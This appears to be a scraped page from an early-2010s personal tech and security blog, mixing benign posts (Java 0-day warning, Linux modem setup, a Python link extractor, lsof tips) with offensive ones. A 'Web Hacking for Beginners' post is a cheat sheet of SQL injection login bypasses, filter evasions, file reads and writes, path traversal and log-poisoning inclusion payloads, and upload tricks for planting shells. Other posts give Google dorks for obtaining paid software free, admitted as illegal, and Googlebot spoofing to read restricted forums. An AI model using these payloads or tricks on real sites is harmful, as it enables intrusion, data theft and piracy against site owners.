Java 0-day In The Wild - Disable Java Plugin NOW

Security researchers have discovered yet another critical Java 0-day exploit being used by majority of the browser exploit packs such as Blackhole and Cool. Users are urged to DISABLE the Java plugin RIGHT NOW.

French researcher Kaffeine discovered that the java 0-day has been spotted to be making big hits daily, in a blog post. This particular exploit has proven to be very serious threat for the users. The folks at AlienVault Lab have also reproduced the exploit and it seems to work over all the java versions across all platforms which is a very serious threat.

As for now, the users are highly urged to disable their JAVA plugins right now so that they do not get hit by these 0-days.

So what are you waiting for?

Important links:

How To Disable Java Plugin

Kaffeine's blog post

Alien Vault Labs Post


Read more...

The Scale Of Universe [A Must Watch]

Well this is so absofuckingly awesome that I decided it is worth making post about this particular site. Without further delay, I present you this awesome link

Scale of Universe

I hope you loved the site like I did :)




Read more...

GitHub Snippet Sharing Gist Gets Revamped

GitHub team has today announced the new Gist, their online snippet sharing tool. Gist is a simple way to share snippets and pastes with others offering syntax support for several languages, configuration file formats and document formats.

The great thing about Gist is that all gists are git repositories, so they are automatically versioned, forkable and usable as a git repository. Whether it's a simple snippet or a full app, Gist is a great way to get your point across.

The new Gist is re-written completely from scratch using better libraries and following appropriate style guide.

Read rest of the story at GitHub


Read more...

Inj3ct0r Team Hacked ExploitHub, Stole Private Exploits Worth $242333

Inj3ct0r team, which provides the ultimate database of exploits and vulnerabilities and serves as a great resource for vulnerability researchers and security professionals, has hacked ExploitHub.com, the site similar to inj3ct0r and stolen several private exploits worth $242333.

In the post from inj3ct0r team, they have provided the details for motivation of hack and the process of hack. At the time of writing this, ExploitHub.com seems to be down.

The post gives the process to accomplish the hack as below: I am very much surprised when he learned of Magento eCommerce Software and search /install/ 1) We scan server and site 2) We reinstall Magento CMS https://www.exploithub.com/install/ <= We reinstall Magento CMS 3) Upload shell and phpinfo https://www.exploithub.com/phpinfo.php 4) Back all files and database. 5) Upload piece of the database https://www.exploithub.com/export/ 6) Increased privileges


Read more...

ImageShack and Symantec Hacked And Dumped

2012 has been a year of leaks and hacks and continues to be so. Hackers hacked into ImageShack and Symantec servers and have leaked several critical information regarding the servers and employees.

Hackers have disclosed in an e-zine that the security practices of these major companies have been a joke: In case of ImageShack, all MySQL instances as root, really old (2008) kernels, hardcode database passwords, enable register_globals, etc.

The e-zine says:

ImageShack has been completely owned, from the ground up. We have had root and physical control of every server and router they own.

Likewise, they have dumped the database of Symantec, one of the leading AV companies which includes the critical information of the researchers at Symantec.

Links

Pastebin

AnonPaste


Read more...

How To Automatically Start Firefox In Private Browsing Mode

In this post, I will provide the instructions for few of the methods to automatically start firefox in private browsing mode.

Method 1

Go to Edit -> Preferences and then select the Privacy tab. From the History dropdown list, choose the Firefox will Use custom settings for history and then check the Always use the private browsing mode option.

Method 2

The second method involves changing the firefox configuration which can be accessed by typing about:config in the address bar. The first method described above essentially changes one particular preference name browser.privatebrowsing.autostart in background and this second method involves doing that background job manually on our own.

Once you open about:config configuration page, search for private and from the resulting list, modify the boolean value of browser.privatebrowsing.autostart to true by double clicking on it.

I hope this helps. If you got any other method, please drop it as a comment. :)


Read more...

How To Manually Install Flash Player 11 In Linux

This post will provide a step by step instructions for installing flash player 11 plugin in ubuntu 11.04 and other different versions and distros. This will be helpful for everybody who are having trouble with the software center like I had.


Make sure no firefox process is running and then fire up the terminal and type the following commands in order:

mkdir -p ~/flash && cd ~/flash

wget http://archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.238.orig.tar.gz

tar -zxvf adobe-flashplugin_11.2.202.238.orig.tar.gz

sudo cp -r libflashplayer.so /usr/lib/firefox/plugins

sudo cp -r usr/* /usr

Once you have finished copying the shared object and other necessary files in their respective target directories, you can open the firefox and you're good to go. :)


Read more...

How Does Windows 7 Determine Internet Access Status

So I was curious on how Microsoft is managing to determine the status of internet access. I am a linux user and I have been thinking of having something similar to windows in ubuntu as well. Due to curiosity, I was tempted to dig further upon this and here is my finding.

What tool would be better than wireshark to analyze network traffics so I fired up wireshark in my friend's laptop. I took out the ethernet cable, started the capture in the ethernet interface, and then plugged in the ethernet cable back. I waited till the internet access status was shown at the right bottom(right part of taskbar) and stopped the live capture.

Now to the fun part, I analyzed the capture with my noob skill.

One particular entry was the DNS query for . Curios, I opened the site to find 403 forbidden error. I was now starting to think that Microsoft does the DNS lookup for this particular site and if it fails, Windows shows No Internet Access sign.

Wait!!! There's something more. Further analysis showed that a GET request is made for the file ncsi.txt to that website. Following the stream, I found out that the page contained the text Microsoft NCSI.



So this is what I concluded after this analysis:

Windows performs a dns lookup for www.msftncsi.com then after it succeeds, a request is made to http://msftncsi.com/ncsi.txt which should contain the text Microsoft NCSI.

I did a google search on Microsoft NCSI and THIS PAGE gives a detailed description on NCSI which stands for Network Connectivity Status Indicator.

If you guys have researched on this and found something different, please let us know by throwing a comment.


Read more...

100% Internet Explorer 6 Clone In HTML5

Well I came across this website via some referral online and thought of sharing with you guys. A funny 100% IE6 clone done in HTML5 that MAKES sense :D.

IE6 Clone in HTML5


Read more...

Setting Up Ncell Connect In Linux

Today I got a NCELL Connect device from my junior friend and did a quick PPP setup on linux. Later thought that this would be useful for other guys who use ubuntu(thats what I'm using) and other distros and hence am posting the steps on setting up Ncell connect in linux.

1. Install wvdial. Wvdial is a dialer that lets you to make a PPP connection in order to connect to the internet. Fire up the terminal and run the following command:

samar@Techgaun:~$ sudo apt-get install wvdial

Optionally you could also install gnome-ppp(sudo apt-get install gnome-ppp) for GUI but wvdial does all the job.

2. Edit the /etc/wvdial.conf, the configuration file for wvdial which requires appropriate setting for NCell connect and replace all the text with following data.

[Dialer Defaults]
Stupid Mode = 1
Modem Type = Analog Modem
ISDN = 0
Phone = *99#
Modem = /dev/ttyUSB0
Username = web
Dial Command = ATDT
Password = web
Baud = 460800
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0

In the above process, you can run the wvdialconf command to see if your Huawei card is being detected. The Modem = line may require appropriate value.




3. While your device is plugged in, type the following command and note the line containing huawei.

samar@Techgaun:~$ lsusb
Bus 002 Device 005: ID 12d1:1446 Huawei Technologies Co., Ltd. E1552 (HSPA modem)
Bus 002 Device 004: ID 0408:03f1 Quanta Computer, Inc.
Bus 002 Device 003: ID 138a:0005 DigitalPersona, Inc
Bus 002 Device 002: ID 8087:0020 Intel Corp. Integrated Rate Matching Hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 025: ID 04f3:0210 Elan Microelectronics Corp. AM-400 Hama Optical Mouse
Bus 001 Device 002: ID 8087:0020 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

We are concerned with the vendor and product id. In the above information, 12d1 is the vendor ID and 1446 is the product id. Now perform the following in the terminal:

samar@Techgaun:~$ sudo modprobe usbserial vendor=0x12d1 product=0x1446

4. Now we must be all good. All we have to do is dial the connection. Type the following in the terminal:

samar@Techgaun:~$ sudo wvdial

If everything is fine, your connection will be successful showing the information such as IP address and primary and secondary DNS information. I hope this helps. Enjoy the NCELL connect in linux :)


Read more...

Extracting All Hyperlinks From Webpages - Python

In this example, I am going to show how easily you can extract all the links in a webpage using python. If you are learning to write some small scale crawler, this can be a quick startup on how you can extract the links in any webpage.

Basically, we will send the http request to any webpage and we will read the HTML response except in the case when the connection can not be established. In such case, we will simply inform the user that we could not connect to the website.

For all these stuffs, we will import few modules and most important ones are re and urllib2 for regular expression stuff and HTTP request/response stuffs respectively.

We then write the regex for the hyperlinks for which we will make a search in the HTML data we get back after sending the request from the server. Note the <a href=[\'"]?([^\'" >]+). The small brackets are there to let us capture our necessary information i.e. the actual links.

Now you understood what we'll be doing, below is the python script to extract the hyperlinks from any webpage.

#!/usr/bin/python

import re, urllib2
from sys import argv

if (len(argv) != 2):
    print "No URL specified. Taking default URL for link extraction"
    url = "http://www.techgaun.com"
else:
    url = str(argv[1])
    
links_regex = re.compile('<a href=[\'"]?([^\'" >]+)', re.IGNORECASE)
url_request = urllib2.Request(url)
try:
    response = urllib2.urlopen(url_request)
    html = response.read()
    links = links_regex.findall(html)
    print '\n'.join(links)
except urllib2.URLError:
    print "Can't Connect to the website"

Now run the script as python extracter.py http://www.techgaun.com or any URL you wish to.

So isn't it a good start for writing your own simple web crawler? :P


Read more...

Determine All Internet Connections And Corresponding Running Processes In Linux [How To]

Sometimes you might want to see all the internet connections being made by the running processes in the linux system. I am writing this small commandline trick to view all the internet connections using the lsof command.

lsof command is used to all the open files and the processes opening those files. All kind of resources such as disk, network connections, pipes, etc. are actually implemented as files in linux and the lsof command allows you to get the report regarding the opened files.

To view all the internet connections and the corresponding processes, we can simply use the -i switch as below:

samar@Techgaun:~$ lsof -i

The above command runs fine but is a little bit slow since it tries to resolve the network addresses to host names and port numbers to port names. So you might wish to use the command below for faster response from the lsof command.

samar@Techgaun:~$ lsof -i -Pn

Also, running the lsof command as the root(i.e. sudo lsof | grep -i listen or sudo lsof -i | grep -i listen) will give more extra outputs esp. the "LISTEN" ones i.e. the processes that are listening for incoming connections. This piece of information might be useful in determining the backdoors and rootkits but I've not yet explored into that.

I hope this little trick comes useful sometimes.


Read more...

Watch ASCII Star Wars Through Telnet

Just thought to share this cool link that features a star wars in the telnet. Telnet to the remote server and you'll be shown the star wars story.

Open your terminal and type the following:

telnet towel.blinkenlights.nl

And, the online web version is available at HERE


Read more...

How to get things for free in internet [Google dorks]

Well its been a few days I haven't posted. Today I have come with an interesting post that will help you get things for free in internet. Of course, it is not legal but it works in many cases but not always. And many of the results might be some craps.

Following are the list of the google dorks that will help you get some of the commercial softwares for free. Google dorks are the keyword phrases that can be searched with the google search engine.

intitle:"Thank You For Your Order" intext:Click Here to Download
intitle:"Thank You For Your Purchase" intext:Click Here to Download
inurl:/thankyou*.html intitle:Thank you for your order! intext:Click Here to Download
intitle:"Thank You For Your Order!" intext:download
inurl:thanks intext:"Thank You For Your Order!" "Click Here" filetype:html

The above dorks are just the examples. You can modify them and do some experiments on your own to search for specific domains, etc. I hope this is useful. Thanks :)

Read more...

Download.com.np : A nepali download portal

I came across this nepali download portal Download.com.np which seems to be powered by MOS.

Mercantile communications, a leading Kathmandu based IT Company, developed a useful website download.com.np for most of the download users who frequently requires different kinds of freeware/shareware programs in their day to day professional life. Download.com.np aims to be a window for collection of the different Freeware and shareware programs with easier and faster downloading from the local network.


Visit the site

Happy downloadings, Nepali users :)

Read more...

ieHTTPHeaders : An IE alternative for livehttpheaders add-on

Well IE sucks but still if you need to use it and require some http header viewing addon like livehttpheaders for mozilla firefox, then there exists a tool called ieHTTPHeaders serving the same purpose.

I won't write much about it, just visit the official webpage for more information and download links:
Official webpage of ieHTTPheaders
Thanks.

Read more...

Web Hacking for Beginners and Intermediates

This is the article I posted on the secworm contest and I am now posting this in my blog. Its not that well written due to the lack of time but still will help some of you out there.

Hi all, I am Deadly Ghos7 aka sam207 and this is my article as the entry for the secworm contest #1. First, I would like to apologize for any kind of grammar mistakes in this article as there would be surely lots of grammatical errors in this article.

This article is not an article about teaching the basics of any web hacking techniques. Instead, it is the document of tips and tricks that the beginners and intermediates can make use of in order to attack the web applications on certain scenarios. I assume that you know the basics of the web hacking techniques or you could google for learning the basics. I'll be covering the tricks on different web hacking methods such as SQL injection(MySQL basically), insecure file inclusions, insecure file upload, etc. As already stated, the article won't be about basic but rather would present you few useful tricks that might be useful in the course of web-app pentesting.

SQL Injection:
Comments: - - , /* , #
MySQL version: SELECT @@version

Current SQL User: SELECT user()
SELECT system_user()

Current Database: SELECT database()

MySQL Data directory(location of MySQL data files): SELECT @@datadir

List all MySQL users: SELECT host, user, password FROM mysql.user

Bypass Quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 --hex
SELECT pass FROM users WHERE user=char

Load local file: SELECT LOAD_FILE('/etc/passwd') --We can use quote bypassing here.

Create File with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
quote bypassing seems not working here. The path can't be encoded using the quote or char so we can't bypass the quote in this case.

Using limit: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one column is seen while doing SQLi)

unhex(hex()): union all select 1,concat(unhex(hex(username,0x3a,password))) from tblusers--

Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),table_name(from)(information_schema.tables)) --Bypassing the whitespace filter
0%a0union%a0select%091

XSS with SQLi (SIXSS): union all select 1,<script>alert(123)</script>

Login bypass:
'=' in both username and password field
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
In the username field and random password, it would bypass the vulnerable authentication login.

' /*or*/ 1='1 –Bypasses or filter


File Inclusion:
-> A sample vulnerable piece of code would be something like below: test.php


including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd

path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd

Nullbyte injection
test.php?page=../../../../../etc/passwd

Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/

PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php

Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
With more details on this, http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
Apache Log injection
test.php?page=../logs/access.log
You'll have to find the location of the log in order to include it. Also you should try including everything you can such as the session files, uploaded files, etc. For the apache log injection, you'll have to telnet and send the GET request for arbitrary PHP code like Get / Few apache log locations to try are as below:

Useragent
test.php?page=../../../../../../../proc/self/environ
Set your useragent to some php code and it will get executed if you are able to include the /proc/self/environ file.

Check existence of folder:
test.php?page=../../../../../folder/you/guess/../../../../../etc/passwd
Here the trick is basically using the path traversal method.

File upload:
Nullbyte injection: If only valid extensions(such as jpg, gif) are allowed, we can rename our shell to shell.php.jpg which will bypass the file upload security check.

PHP code within image: Sometimes the uploads are not checked for the file extension but for dimensions of images. This again can be bypassed by injecting PHP codes in the valid images and renaming them to .php file. The tool named edjpgcom can be used in order to inject the PHP code as JPEG comments in the images.

Header bypass: Again sometimes the developer just relies on the header information that contains the type of the file like “image/jpeg” for jpeg image. But since this is passed from client side, it can be modified using the tools such as tamper data or live http headers.

Also, the file upload feature can be exploited in union with the file inclusion vulnerability. If you have a site vulnerable to the file inclusion but not vulnerable to the insecure file upload, you can upload valid image as said in second method here and then you can include that file with the file inclusion vulnerable PHP script.

As said earlier, this article is not about giving you every steps of how to exploit the web vulnerabilities.



Read more...

Browsing the restricted forums without registering

Well it has worked for me and I am posting how you can browse the restricted forums by misusing the SEO things(I guess). A website traffic hugely depends upon the google search and hence most of the websites allow the google bot to crawl and index their pages for appearing in the search result. Now the google bot useragent is allowed to crawl any restricted forum and hence they can index those pages.

The requirement is the useragent switcher add-on for firefox which can be downloaded from HERE. Install this addon and restart it.

Now in the firefox menu, under tools, you will see a new option Default User Agent from where you can choose different user agents and add new user agents. Among the available user agents, you will find the Google Bot 2.1 useragent under the Search Robots option. Choose the Google Bot 2.1 as your default user agent and now start visiting the forums that were asking you to register. It will also work on other types of websites which usually require login. I hope this helps you. Thanks :)

Read more...

Nude.js - Nudity detection with javascript and HTMLCanvas

Today I came across an interesting page on nudity detection with javascript and HTMLCanvas. nude.js is an open source script that would be pretty useful for client side nudity detection for child filter and other social media platforms.

nude.js is a JavaScript implementation of a nudity scanner based on approaches from research papers. HTMLCanvas makes it possible to analyse image data and afterwards decide whether it should be displayed or not. The detection algorithm runs at the client, therefore it's possible (with user interaction) to display the image even if it's identified as nude (false positive).

you can download the nude.js from HERE.

For the demo, visit this page.

Read more...

Searching flash games using Google Search trick

Another google trick, this can be used to search any flash games(swf files) you want to play.

So you just played a flash game which was really cool and you want to download it in your computer? You can use google's search trick to search for any flash game you want.
This trick relies on the way directory listing is done in the webserver's directories. Whenever the default index page or directory listing denying features are not implemented in the web server, we can view the files in the directory. I'm not going into the further detail of this, instead I'm going to show you how to perform the google search for finding whatever flash game you want.

I need the game called gravity which is very fun to play. Now I do the search as below to find it:

"index of /" "last modified" "parent directory" swf gravity

You can replace the gravity with the name of the flash game you want to search and download.

Have fun with this google trick. :)

Read more...